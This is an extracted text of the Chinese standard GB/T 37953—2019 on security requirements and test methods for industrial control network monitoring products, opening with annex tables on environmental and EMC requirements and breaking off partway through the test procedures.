X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.20 交流电源输入端口电压暂降抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.11—2008 2类 B Ⅱ 3类 B X⁴ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.21 交流电源输入端口短时中断抗扰度要求 等级 依据标准 严酷等级 判据 I GB/T 17626.11—2008 2类 C Ⅱ 3类 C X 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.22 交流电源输入端口电压变化抗扰度要求 等级 依据标准 试验参数 电压实验等级 电压降低所需时间 降低后电压维持时间 电压增加所需时间 判据 I GB/T 17626.11—2008 70% 突变 1周期 25周期 A X” 特定 特定 特定 特定 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.23 直流电源输入端口纹波抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.17—2005 2 A Ⅱ 3 A Ⅲ 4 A X 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.24 直流电源输入端口电压暂降抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.29—2006 试验等级:40%Ur和70%Ur;持续时间:1 s A X” 特定 “X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.25 直流电源输入端口短时中断抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.29—2006 试验等级:0%Ur;持续时间:1s B X“ 特定 X是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 表 B.26 直流电源输入端口电压变化抗扰度 等级 依据标准 严酷等级 判据 I GB/T 17626.29—2006 试验等级:80%Ur和120%Ur;持续时间:10 s A X 特定 aX是一个开放等级,具体电磁兼容性能力要求可根据设备实际应用环境与客户协商确定。 B.4 绝缘性能 B.4.1 绝缘电阻 设备的绝缘电阻要求见表 B.27。 表 B.27 绝缘电阻要求 名称 依据标准 一般环境绝缘电阻 GB/T 13729—2002的表13 湿热环境绝缘电阻 GB/T 13729—2002的表14 B.4.2 绝缘耐压 设备的绝缘耐压要求见表 B.28。 表 B.28 绝缘耐压要求 名称 依据标准 严酷等级 额定绝缘电压小于60 V的回路 GB/T 15153.1—1998 VW2 额定绝缘电压大于60 V的回路 VW3 注:高海拔地区空气密度小,同等电压下,空气更容易产生电离现象,使设备的绝缘性能下降。在高海拔地区使 用的设备可通过合理设计,保证其绝缘性能。 B.4.3 泄漏电流 设备工作时对保护接地端的泄露电流应不大于5 mA。 B.5 接地 设备应具有接地端子及标记,标记应具耐久性且易识别,接地直流电阻不大于10 mΩ。 B.6 机械适应性 设备应提供工业环境中的机械适应性能力,具体技术要求见表 B.29。 表 B.29 机械适应性要求 名称 依据标准 等级 备注 正弦振动-工作 GB/T 2423.10—2008 5 Hz≤f≤9 Hz,7 mm;9 Hz≤f≤150 Hz, 2.0 g;每分钟一倍频程(±10%) 在3个互相垂直轴的每 个轴上分别扫描10次 冲击-工作 GB/T 2423.5—1995 15g,持续时间:11 ms/次,脉冲波形:半正弦 每个坐标轴的+/一方向各 进行3次冲击,即共18次 垂直冲击-包装 运输 GB/T 2423.8—1995 未包装产品质量≤10 kg,跌落高度0.25 m 未包装产品质量≤50 kg,跌落高度0.10 m 面棱角的顺序,每个 包装实验3次 在完整包装箱中质量≤50 kg,跌落高度0.5 m 在完整包装箱中质量≤100 kg,跌落高度0.25 m B.7 外壳防护 设备的外壳防护等级由制造商和用户协商确定,防护等级应从表 B.30 规定的范围内选择。 表 B.30 外壳防护等级表 防尘等级 IP2X IP3X IP4X IP5X 防水等级 IPXO IPX1 IPX2 IPX3 IPX4 IPX5 IPX6 依据标准 IPX7 GB/T 4208—2017
standards
信息安全技术 工业控制网络监测 安全技术要求及测试评价方法 Information security technology—Security requirements and evaluation approaches for industrial control network monitor 随着工业化与信息化的深度融合,来自信息网络的安全威胁正逐步对工业控制系统造成极大的安 全威胁,通用网络监测产品在面对工业控制系统的安全防护时显得力不从心,因此需要一种能应用于工 业控制环境的网络监测产品对工业控制系统进行安全防护。 应用于工业控制环境的网络监测产品与通用网络监测产品的主要差异体现在: ——通用网络监测产品主要针对互联网通用协议进行分析和响应。应用于工业控制环境的网络监 测产品除了能够分析部分互联网通用协议外,还具有对工业控制协议的深度解析能力,而无需 对工业控制系统中不会使用的通用协议进行分析。 应用于工业控制环境的网络监测产品可能有部分组件需部署在工业现场环境,因此比通用网 络监测产品具有更高的环境适应能力。 ——应用于工业控制环境的网络监测产品比通用网络监测产品具有更高的可用性、可靠性、稳 定性。 信息安全技术 工业控制网络监测 安全技术要求及测试评价方法 1 范围 本标准规定了工业控制网络监测产品的安全技术要求和测试评价方法。 本标准适用于工业控制网络监测产品的设计生产方对其设计、开发及测评等提供指导,同时也可为 工业控制系统设计、建设和运维方开展工业控制系统安全防护工作提供指导。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 2423.5—1995 电工电子产品环境试验 第2部分:试验方法 试验 Ea 和导则:冲击 GB/T 2423.8-1995 电工电子产品环境试验 第2部分:试验方法 试验 Ed: 自由跌落 GB/T 2423.10—2008 电工电子产品环境试验 第2部分:试验方法 试验 Fc: 振动(正弦) GB/T 4208—2017 外壳防护等级(IP 代码) GB/T 17214.4—2005 工业过程测量和控制装置的工作条件 第4部分:腐蚀和侵蚀影响 GB/T 18336.1—2015 信息技术 安全技术 信息技术安全评估准则 第1部分:简介和一般 模型 GB/T 22239—2019 信息安全技术 网络安全等级保护基本要求 GB/T 25069—2010 信息安全技术 术语 GB/T 32919—2016 信息安全技术 工业控制系统安全控制应用指南 3 术语和定义 GB/T 25069—2010、GB/T 32919—2016 和 GB/T 18336.1—2015界定的以及下列术语和定义适 用于本文件。 3.1 工业控制系统 industrial control system 多种工业生产中使用的控制系统。 注:包括监控和数据采集系统(SCADA)、分布式控制系统(DCS)和其他较小的控制系统,如可编程逻辑控制器 (PLC), 现已广泛应用在工业部门和关键基础设施中。 3.2 工业控制网络监测 industrial control network monitoring 部署于工业控制网络中,以实现针对工业控制网络中网络行为的安全事件监测、审计和管理等功能 的技术。 注1:用于监测和分析工业控制网络中的数据报文,发现违反安全策略的行为、异常操作、工业控制设备被攻击的迹 象,或工业生产受到影响的迹象。 注2:本标准所指“工业控制网络监测”即“工业控制网络监测产品”。工业控制网络监测产品是部署于工业控制网 络中,用于实现工业控制网络监测功能的设备产品。 4 缩略语 下列缩略语适用于本文件。 DNP 分布式网络协议(Distributed Network Protocol) FTP 文件传输协议(File Transfer Protocol) HTTP 超文本传输协议(Hypertext Transfer Protocol) NTP 网络时间协议(Network Time Protocol) OLE 对象连接与嵌入(Object Linking and Embedding) OPC 用于过程控制的 OLE(OLE for Process Control) 5 产品描述 工业控制网络监测产品是应用于工业控制环境,通过监视工业控制网络内的数据报文,实时获取数 据包进行深度解析,监测工业控制网络中的入侵行为和异常行为,并及时告警的设备。该设备需满足特 定工业环境和安全功能要求,可对工业控制网络边界或工业控制网络内部不同控制区域之间进行监测 保护,发现非法入侵活动,并根据监测结果实时报警、响应,达到主动发现入侵活动、确保网络安全目 的。该设备产品可以硬件或者软件形式实现。 本标准按照工业控制网络监测产品安全功能要求强度,对工业控制网路监测产品分为基本级和增 强级,安全功能强弱和安全保证要求高低是等级划分的具体依据。其中基本级安全功能要求应具备 GB/T 22239-2019 中第二级安全保护能力,增强级安全功能要求应具备GB/T22239-2019 中第三级 安全保护能力。在增强级中新增的要求会通过黑体标识。 工业控制网络监测安全技术要求的分级及其要求条款见附录 A, 工业控制网络监测测评方法的分 级及其测评项见附录 B,工业环境应用要求见附录 C。 6 安全技术要求 6.1 安全功能要求 6.1.1 功能要求 6.1.1.1 安全事件监测 6.1.1.1.1 流量监测 产品应能够具有流量监测的功能,具体满足下述要求: a) 应能够监视网络内的流量数据包,实时获取数据包用于检测分析,且不影响工控设备正常 运行。 b) 应能够监测指定的协议或 IP地址的流量数据包,且不影响工控设备正常运行。 6.1.1.1.2 工业控制协议分析 对于在工业控制网络内获取的数据包,产品应能够分析其承载的工业控制协议报文,满足下述一种 要求: a) 分析以下(但不限于)通用协议:Modbus/TCP 协议、OPC Classic 协议、DNP3.0 协议、 IEC-60875-5-104协议、SIEMENS S7Comm 协议、PROFINET 协议、EtherNet/IP 协议; b) 一种行业专业协议,例如,IEC-61850 议、轨道交通专业协议等。 MMS协议、IEC-61850 GOOSE协议、IEC-61850 SV 协 6.1.1.1.3 互联网协议分析 对于在工业控制网络内获取的互联网协议流量,产品应能够分析其承载的数据报文,分析以下(但 不限于)互联网协议报文: a) HTTP; b) FTP; c) TELNET; d) SNMP。 6.1.1.1.4 攻击行为监测 产品应能够通过分析、对比等方法,包括但不限于发现以下攻击行为: a) 工业协议漏洞攻击; b) 工业控制应用漏洞攻击; c) 操作系统漏洞攻击; d) 工业控制设备漏洞攻击; e) 应能够监测网络中蠕虫病毒、木马等攻击行为的发生,且不影响工控设备正常运行。 注:安全漏洞和攻击参见国家信息安全漏洞共享平台发布的信息。 6.1.1.2 安全事件响应 6.1.1.2.1 事件告警 对于攻击行为或异常行为,产品应按照事件的严重程度将事件分级,采取屏幕实时提示等直观有效 的方式传达告警讯息。 6.1.1.2.2 告警过滤 产品应允许管理员定义安全策略,对工业控制网络中的指定事件不予告警。 6.1.1.2.3 事件合并 产品应对高频度发生的相同安全事件进行合并告警,避免出现告警风暴。 6.1.1.2.4 定制响应 产品应允许管理员定义安全策略,对工业控制网络中的事件定制响应方式。 6.1.1.3 安全配置管理 6.1.1.3.1 安全策略配置 产品应提供安全策略配置功能。 6.1.1.3.2 工业控制漏洞知识库 产品应内置工业控制漏洞知识库,内容应包括工业控制协议漏洞、工业控制应用漏洞、操作系统漏 洞和工业控制设备漏洞,详细的漏洞修补方案和可采取的对策。 6.1.1.3.3 工业控制检测特征库 产品应内置工业控制检测特征库,详细的修补方案和可采取的对策。 6.1.1.3.4 工业控制协议端口设定 除支持基于默认端口的工业控制网络协议解析外,产品应能对现有工业控制协议和扩展工业控制 协议的端口进行重新设定。 6.1.1.3.5 自定义攻击事件 产品应允许管理员对攻击事件进行自定义,自定义的内容应包括攻击目标、攻击特征和事件等级。 6.1.1.3.6 工业控制协议扩展 除支持默认的工业控制网络协议外,产品应支持添加新的工业控制协议。 6.1.1.4 产品功能管理 6.1.1.4.1 界面管理 产品应提供友好的管理员界面用于管理和配置。管理配置界面应包含配置和管理产品所需的所有 功能。 6.1.1.4.2 硬件管理 6.1.1.4.2.1 分布式部署和集中管理 产品应具有分布式部署的能力。 产品应设置集中管理平台,对同一系列不同型号监测设备进行统一管理。 6.1.1.4.2.2 端口分离 监测设备应配备不同的物理端口,分别用于配置管理和网络数据监听。 6.1.1.4.2.3 产品自检 产品在启动和正常工作时,应具备运行状态自检机制,包括硬件工作状态监测、组件连接状态监测 等,以验证产品自身状态是否正常。 6.1.1.4.2.4 时钟同步 产品应提供与外部的时钟服务器进行时钟同步的功能。 6.1.1.4.2.5 时钟设置 产品应提供手动设置时钟的功能,以便在没有外部时钟服务器时设置正确时间。 6.1.1.4.2.6 电源冗余 产品应提供电源冗余功能。 6.1.1.4.2.7 掉电物理导通 串联部署时产品应能够在突发掉电的情况下,自动实现每一对输入输出通信端口的物理导通。 6.1.1.4.2.8 硬件故障处理 产品应能够监测自身硬件是否工作正常,并在出现故障时及时向管理员告警。 6.1.1.4.3 配置信息恢复 替换监测设备后,产品应能够通过本地或远程进行配置信息恢复。 6.1.1.4.4 数据存储空间管理 在存储器空间将耗尽时,产品应自动产生告警。触发告警的剩余存储空间限值应由管理员自主设 定。产品应采取措施保证已存储的事件记录可用和后续事件记录的存储(例如,转存已有事件记录、仅 记录重要的事件数据等)。产品应允许用户设定在空间耗尽时的处理策略。 6.1.1.4.5 升级管理 6.1.1.4.5.1 库升级 产品应具有本地和远程升级工业控制漏洞知识库和工业控制检测特征库的功能。 产品应具有通过控制台或管理平台对监测设备的工业控制漏洞知识库和工业控制检测特征库进行 统一升级的功能。 6.1.1.4.5.2 产品升级 产品应具有通过本地和远程进行升级的功能。 6.1.1.4.5.3 产品统一升级 产品应具有通过控制台或管理平台对监测设备进行统一升级的功能。 6.1.1.4.5.4 升级包校验 产品应确保事件库和产品升级时的安全,应具有升级包校验机制,防止得到错误的或伪造的升级 包。升级过程须进行双向身份鉴别。 6.1.1.4.6 用户管理 6.1.1.4.6.1 标识管理 产品应支持权限划分,为每一使用者设置安全属性信息,包括标识、鉴别数据、授权信息或管理组信 息、其他安全属性等。 6.1.1.4.6.2 超时设置 产品应具有使用者登录超时重新鉴别功能。在安全策略设定的时间段内没有任何操作的情况下, 锁定或终止会话,需要再次进行身份鉴别才能够重新登录。 6.1.1.4.6.3 控制台鉴别 产品应在使用者通过控制台对监测设备执行任何与安全功能相关的操作之前对控制台进行鉴别。 6.1.1.4.6.4 会话锁定 产品应允许使用者锁定当前的交互会话,锁定后需要再次进行身份鉴别才能够重新登录。 GB/T 37953—2019 6.1.1.4.6.5 鉴别数据保护 产品应保护鉴别数据不被未授权查阅和修改。 6.1.1.5 通信安全 6.1.1.5.1 通信保密性 产品若由多个组件构成,应保证各组件之间通信的保密性。 6.1.1.5.2 通信完整性 产品若由多个组件构成,应保证各组件之间通信的完整性。如果数据的完整性被破坏,产品应确保 及时发现并通知管理员。 6.1.2 自身安全要求 6.1.2.1 用户管理与鉴别 6.1.2.1.1 用户管理 产品应支持用户管理,包括添加、删除、激活、禁止用户。 产品应为每个用户设定标识、权限等安全属性。 6.1.2.1.2 用户鉴别 产品应在用户登录时进行鉴别。 6.1.2.1.3 鉴别失败处理 当用户鉴别尝试失败连续达到指定次数后,产品应阻止用户进一步的鉴别请求。 6.1.2.1.4 超时设置 产品应具有登录超时锁定或注销功能。 6.1.2.1.5 远程管理 若产品的控制台提供远程管理功能,应能对可远程管理的主机地址进行身份鉴别和访问控制,并保 证传输数据的保密性和完整性。 6.1.2.2 产品升级 6.1.2.2.1 升级功能 产品应具有升级的功能(包括修复自身缺陷等)。 6.1.2.2.2 升级包校验 产品应具有升级包校验机制,防止得到错误的或伪造的升级包。 6.1.2.3 日志管理 6.1.2.3.1 安全日志生成 产品应对相关安全事件生成安全日志,包括但不限于: a) 登录成功和退出、登录失败; b) 重启; c) 鉴别连续尝试不成功的次数超出了设定的限值; d) 增加、删除管理员角色和对管理员角色的属性进行修改的操作; e) 升级; f) 监测操作。 每一条安全日志应包括事件发生的日期、时间、用户标识、事件类型、事件描述和结果。若采用远程 登录方式对产品进行管理还应记录管理主机的地址。 6.1.2.3.2 安全日志管理 产品应提供下列安全日志管理功能: a) 只允许授权管理员访问安全日志; b) 提供对安全日志的查询功能; c) 授权管理员应能保存或删除安全日志; d) 安全日志应能够以通用格式(例如,Excel) 导出。 6.1.2.4 策略安全管理 产品应对监测策略的创建、修改、删除、应用提供访问控制等安全措施。 6.1.2.5 时钟同步 产品及组件应支持时间同步功能: a) 若由多个组件组成,各组件应支持与中心监测组件进行时间同步; b) 中心监测组件应支持与外部时间服务器进行时间同步。 6.1.2.6 敏感信息保护 定制监测策略时, 一些敏感信息可能被涉及,应采取相应措施来保证敏感信息的保密性和完整性, 例如,对用户口令进行加密存储。 产品应只允许具有权限的用户读取监测数据。 6.2 安全保障要求 6.2.1 产品配置管理 6.2.1.1 配置管理能力 6.2.1.1.1 版本号 开发者应为产品的不同版本提供唯一的标识。 6.2.1.1.2 配置项 工业控制系统网络监测产品应满足以下要求: a) 开发者应使用配置管理系统并提供配置管理文档。 b) 配置管理文档应包括一个配置清单,配置清单应唯一标识组成产品的所有配置项并对配置项 进行描述,还应描述对配置项给出唯一标识的方法,并提供所有的配置项得到有效维护的 证据。 6.2.1.1.3 授权控制 工业控制系统网络监测产品应满足以下要求: a) 开发者提供的配置管理文档应包括一个配置管理计划,配置管理计划应描述如何使用配置管 理系统。实施的配置管理应与配置管理计划相一致。 b) 开发者应提供所有的配置项得到有效地维护的证据,并应保证只有经过授权才能修改配置项。 6.2.1.2 配置管理覆盖 工业控制系统网络监测产品应满足以下要求: a) 配置管理范围至少应包括产品实现表示、设计文档、测试文档、指导性文档、配置管理文档,从 而确保它们的修改是在一个正确授权的可控方式下进行的。 b) 配置管理文档至少应能跟踪上述内容,并描述配置管理系统是如何跟踪这些配置项的。 6.2.2 交付与运行 6.2.2.1 交付程序 工业控制系统网络监测产品在交付时应满足以下要求: a) 开发者应使用一定的交付程序交付产品,并将交付过程文档化。 b) 交付文档应描述在给用户方交付产品的各版本时,为维护安全所必需的所有程序。 6.2.2.2 安装、生成和启动程序 开发者应提供文档说明产品的安装、生成和启动的过程,并对产品的现场调试运行提供详细的 说明。 6.2.3 开发 6.2.3.1 描述性高层设计 开发者应提供产品安全功能的高层设计,高层设计应满足以下要求: a) 按子系统描述安全功能的结构; b) 描述每个安全功能子系统所提供的安全功能性; c) 标识安全功能所要求的任何基础性的硬件、固件或软件,以及在这些硬件、固件或软件中实现 的支持性保护机制所提供功能的一个表示; d) 标识安全功能子系统的所有接口; e) 标识安全功能子系统的哪些接口是外部可见的。 6.2.3.2 安全加强的高层设计 开发者提供的安全加强的高层设计应满足以下要求: a) 描述产品的功能子系统所有接口的用途与使用方法,适当时应提供效果、例外情况和错误消息 的细节; b) 把产品分成安全策略实施和其他子系统来描述。 6.2.4 指导性文档 6.2.4.1 管理员指南 开发者应提供管理员指南,管理员指南应与为评估而提供的其他所有文档保持一致。 GB/T 37953—2019 管理员指南应说明以下内容: a) 管理员可使用的管理功能和接口; b) 怎样安全地管理、配置产品,防止产品对工业控制系统实时性等造成影响; c) 在安全处理环境中应被控制的功能和权限; d) 所有与产品的安全操作有关的用户行为的假设; e) 所有受管理员控制的安全参数,如果可能,应指明安全值; f) 每一种与管理功能有关的安全相关事件,包括对安全功能所控制实体的安全特性进行的改变; g) 所有与管理员有关的 IT 环境安全要求。 6.2.4.2 用户指南 开发者应提供用户指南,用户指南应与为评估而提供的其他所有文档保持一致。 用户指南应说明以下内容: a) 产品的非管理员用户可使用的安全功能和接口; b) 产品提供给用户的安全功能和接口的使用方法; c) 用户可获取但应受安全处理环境所控制的所有功能和权限; d) 产品安全操作中用户所应承担的职责; e) 与用户有关的 IT 环境的所有安全要求。 6.2.5 生命周期支持 开发者应提供开发安全文档 。 开发安全文档应描述在产品的开发环境中,为保护产品设计和实现的保密性和完整性所必需的所 有物理的、程序的、人员的和其他方面的安全措施,并应提供在产品的开发和维护过程中执行安全措施 的证据。 6.2.6 测试 6.2.6.1 测试覆盖 6.2.6.1.1 覆盖证据 覆盖证据要求如下: a) 开发者应提供测试覆盖的证据。 b) 在测试覆盖证据中,应表明测试文档中所标识的测试与功能规范中所描述的产品的安全功能 是对应的。 6.2.6.1.2 覆盖分析 覆盖分析要求如下: a) 开发者应提供测试覆盖的分析结果。 b) 测试覆盖的分析结果应表明测试文档中所标识的测试与功能规范中所描述的产品的安全功能 之间的对应性是完备的。 6.2.6.2 测试深度 测试深度要求如下: a) 开发者应提供测试深度的分析。 b) 深度分析应证实测试文档中所标识的测试足以证实该产品的功能是依照其高层设计运行的。 6.2.6.3 功能测试 开发者应测试安全功能,将结果文档化并提供测试文档。 测试文档应包括以下内容: a) 测试计划,应标识要测试的安全功能,并描述测试的目标; b) 测试过程,应标识要执行的测试,并描述每个安全功能的测试概况,这些概况应包括对于其他 测试结果的顺序依赖性; c) 预期的测试结果,应表明测试成功后的预期输出; d) 实际测试结果,应表明每个被测试的安全功能能按照规定进行运作。 6.2.6.4 独立测试 6.2.6.4.1 一致性 开发者应提供适合测试的产品,提供的测试集合应与其自测产品功能时使用的测试集合相一致。 6.2.6.4.2 抽样 开发者应提供一组相当的资源,用于安全功能的抽样测试。 6.2.7 脆弱性分析保证 6.2.7.1 指南审查 开发者应提供指导性文档,指导性文档应满足以下要求: a) 标识所有可能的产品运行模式(包括失败或操作失误后的运行)、它们的后果以及对于保持安 全运行的意义; b) 是完备的、清晰的、 一致的、合理的; c) 列出关于预期使用环境的所有假设; d) 列出对外部安全措施(包括外部程序的、物理的或人员的控制)的所有要求。 6.2.7.2 产品安全功能强度评估 开发者应对指导性文档中所标识的每个具有安全功能强度声明的安全机制进行安全功能强度分 析,并说明安全机制达到或超过定义的最低强度级别或特定功能强度度量,同时应提供产品对实际生产 环境中,工业控制系统稳定运行的影响性分析。 6.2.7.3 开发者脆弱性分析 开发者应开展脆弱性分析,以确保功能的有效实现,具体应满足如下要求: a) 开发者应执行脆弱性分析,并提供脆弱性分析文档。 b) 开发者应从用户可能破坏安全策略的明显途径出发,对产品的各种功能进行分析并提供文档。 对被确定的脆弱性,开发者应明确记录采取的措施。 c) 对每一条脆弱性,应有证据显示在使用产品的环境中,该脆弱性不能被利用。 d) 开发者应提供文档证明经过标识脆弱性的产品可以抵御明显的穿透性攻击。 7 测评方法 7.1 安全功能测评方法 7.1.1 测试环境 网络监测产品功能测试的典型网络拓扑结构如图1所示。主要由测试仪、工业交换机、管理平台和 相互独立的监测设备组成,主要以旁路接入等方式接入。其中,工业控制网络是包含工业控制系统在内 的工业网络,由PLC、DCS等工业控制系统、上位机等终端设备和连接上述设备的网络设备构成,是工 业控制网络监测的基础环境;工业交换机等网络设备为被监测设备,是工控网络监测设备的接入点;工 控网络监测设备是网络监控的主体,同时也是本标准被测试的对象;测试仪和管理平台是测试工具,测 试仪向被测设备发送相关数据报文,测试人员由管理控制台发送相关指令,通过监测设备对整个工控系 统进行监测,以达到相应的预期测评结果。 图 1 网络监测产品功能测试拓扑结构 7.1.2 安全事件监测 7.1.2.1 流量监测 流量监测功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 测试仪向被测设备随机发送工业控制协议报文,且可做数据包解析; 2) 测试人员通过被测设备的控制台指定协议和目标 IP 地址。 b) 预期结果: 1) 被测设备能够实时获取全部数据包,数据完整,解析正确; 2) 测试人员可以通过控制台监测指定协议或目标 IP 地址的数据包。 7.1.2.2 工业控制协议分析 工业控制协议分析功能的测试评价方法与预期结果如下: a) 测试评价方法: 测试仪向被测设备发送6.1.1.1.2 所述的工业控制协议的合法报文,以测试测试仪对数据报文 的识别情况。 b) 预期结果: 被测设备能够识别并正确解析测试仪发送的合法报文。 7.1.2.3 互联网协议分析 互联网协议功能的测试评价方法与预期结果如下: a) 测试评价方法: 测试仪向被测设备发送6.1.1.1.3所述的互联网协议的合法报文,以测试测试仪对数据报文的 识别情况。 b) 预期结果: 被测设备能够识别并正确解析测试仪发送的报文。 7.1.2.4 攻击行为监测 攻击行为监测功能的测试评价方法与预期结果如下: a) 测试评价方法: 测试仪向被测设备发送包含6.1.1.1.4所述的漏洞的攻击报文。 b) 预期结果: 被测设备能够识别攻击报文。 7.1.3 安全事件响应 7.1.3.1 事件告警 事件告警功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 打开产品的事件库,检查是否每个事件都有分级信息; 2) 检查界面显示的安全事件是否具备事件级别信息; 3) 测试仪向被测设备发送攻击报文。 b) 预期结果: 1) 被测设备能够对收集到的数据包进行分析,发现入侵事件; 2) 被测设备以直观有效的方式(例如,屏幕实时提示)传达告警讯息; 3) 被测设备能够按照事件的严重程度将事件分级并报告给管理员; 4) 事件库的所有事件都具有分级信息; 5) 界面显示的安全事件,都以文字等形式显示事件级别。 7.1.3.2 告警过滤 告警过滤功能的测试评价方法与预期结果如下: a) 测试评价方法: 通过被测设备的控制台界面选取工业控制设备IP 地址,指定不予告警。 b) 预期结果: 可以对工业控制设备指定不予告警。 7.1.3.3 事件合并 事件合并功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 设置事件合并规则,将某些内容进行合并,如只显示告警信息的事件名称、发生的次数、源 IP地址等; 2) 连续触发同一事件,查看告警显示的情况,是否是将同一事件进行合并显示。 b) 预期结果: 1) 可以根据需要进行同类事件的合并; 2) 可以按照设置显示告警信息的事件名称、发生的次数、源IP 地址等信息。 7.1.3.4 定制响应 定制响应功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 打开控制台界面,检查产品是否允许管理员设置仅对被检测网段中指定的设备进行告警; 2) 通过被测设备的控制台界面选取 IP 地址,指定响应方式。 b) 预期结果: 可以对工业控制设备指定不同的响应方式。 7.1.4 安全配置管理 7.1.4.1 安全策略配置 安全策略配置功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 登录控制台界面,查看产品提供的默认策略; 2) 查看是否允许编辑或修改生成新的策略。 b) 预期结果: 1) 产品应提供默认的策略,并可以直接应用; 2) 允许管理员编辑策略; 3) 具有供管理员编辑策略的向导功能; 4) 支持策略的导入、导出; 5) 记录产品提供的策略种类和名称。 7.1.4.2 工业控制漏洞知识库 工业控制漏洞知识库功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品是否有漏洞知识库,漏洞知识库是否包含国家信息安全漏洞共享平台等相关组 织机构发布的工控相关漏洞; 2) 检查漏洞知识库的内容。 b) 预期结果: 1) 产品有漏洞知识库,且包含国家信息安全漏洞共享平台等相关组织机构发布的工控相关 漏洞; 2) 漏洞知识库的内容应包括漏洞的定义、详细的漏洞修补方案、可采取的对策等内容。 7.1.4.3 工业控制检测特征库 工业控制检测特征库功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品是否有检测特征库; 2) 检查检测特征库的内容。 b) 预期结果: 1) 产品有检测特征库; 2) 检测特征库的内容应包括详细的修补方案、可采取的对策等内容。 7.1.4.4 工业控制协议端口设定 工业控制协议端口设定功能的测试评价方法与预期结果如下: a) 测试评价方法: 查看产品是否提供自定义协议的界面,是否允许对协议的端口进行重新定义。 b) 预期结果: 可以对协议的端口进行重新定义。 7.1.4.5 自定义攻击事件 自定义攻击事件功能的测试评价方法与预期结果如下: a) 测试评价方法: 查看产品设置,是否提供自定义事件的界面。 b) 预期结果: 1) 可以自定义的攻击事件; 2) 可以自定义的攻击事件的特征应包括攻击对象、攻击特征、告警等级等。 7.1.4.6 工业控制协议扩展 工业控制协议扩展功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 查看协议管理功能; 2) 添加新的工业控制协议。 b) 预期结果: 可以添加新的工业控制协议,并对协议的内容进行正确解析。 7.1.5 产品功能管理 7.1.5.1 界面管理 界面管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 查看管理员界面的功能,包括管理配置界面、告警显示界面等; 2) 通过界面配置控制台和监测设备的连接。 b) 预期结果: 1) 具备独立的控制台; 2) 具有图形化的管理界面; 3) 具备划分清晰功能区域的告警显示界面。 7.1.5.2 硬件管理 7.1.5.2.1 分布式部署和集中管理 分布式部署和集中管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 登录控制台界面; 2) 编辑网络拓扑图。 b) 预期结果: 集中管理平台的拓扑图上应可进行分级部署。 7.1.5.2.2 端口分离 端口分离功能的测试评价方法与预期结果如下: a) 测试评价方法: 查看被测设备的物理端口。 b) 预期结果: 用于产品管理的物理端口和用于网络数据监听的物理端口不同。 7.1.5.2.3 产品自检 产品自检功能的测试评价方法与预期结果如下: a) 测试评价方法: 检查被测设备是否在启动和正常工作时能够周期性地,或者按照授权管理员的要求执行自检, 包括硬件工作状态检测、组件连接状态检测等。 b) 预期结果: 产品在启动和正常工作时,可以周期性地,或者按照授权管理员的要求执行自检。 7.1.5.2.4 时钟同步 时钟同步功能的测试评价方法与预期结果如下: a) 预置条件: 部署NTP 时钟源服务器。 b) 测试评价方法: 1) 配置产品的 NTP 时钟同步的方式和提供NTP 时钟源服务器的IP 地址; 2) 手动执行时钟同步; 3) 断开被测设备的电源,切断时钟源的连接; 4) 重新启动被测设备,查看被测设备的时钟和时钟源的时钟是否一致。 c) 预期结果: 1) 配置提示无出错,时钟同步成功; 2) 产品显示时钟同步的事件和结果; 3) 被测设备的时钟和时钟源上的时间一致。 7.1.5.2.5 时钟设置 时钟设置功能的测试评价方法与预期结果如下: a) 测试评价方法: 检查网络监测产品是否可以手动设置产品时钟。 b) 预期结果: 可以手动设置产品时钟。 7.1.5.2.6 电源冗余 电源冗余功能的测试评价方法与预期结果如下: a) 测试评价方法: 物理识别被测设备是否具备电源冗余,断开被测设备的主电源。 b) 预期结果: 被测设备具备双路电源,并且冗余电源其作用。 7.1.5.2.7 掉电物理导通 掉电物理导通功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 测试仪向被测设备发送报文; 2) 断开被测设备的所有电源。 b) 预期结果: 测试仪可以在一段时间内收到报文。 7.1.5.2.8 硬件故障处理 硬件故障处理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品的硬件失效处理机制; 2) 使被测设备的硬件暂时失效,查看设备情况。 b) 预期结果: 1) 具有硬件失效处理机制; 2) 硬件失效触发告警。 7.1.5.3 配置信息恢复 配置信息恢复功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 将被测设备的配置信息导出; 2) 替换被测设备; 3) 导入配置信息。 b) 预期结果: 新被测设备的配置信息与原被测设备相同。 7.1.5.4 数据存储空间管理 数据存储空间管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 将存储器空间耗至产品默认的告警值以下,查看产品是否可以保证已存储事件记录可用和后 续事件记录的存储。 b) 预期结果: 1) 可以保证已存储事件记录可用和后续事件记录的存储; 2) 提醒管理员采取措施保证已存储事件记录可用和后续事件记录的存储。 7.1.5.5 升级管理 7.1.5.5.1 库升级 库升级功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查工业控制漏洞知识库和工业控制检测特征库的升级方式。 2) 升级工业控制漏洞知识库和工业控制检测特征库。 3) 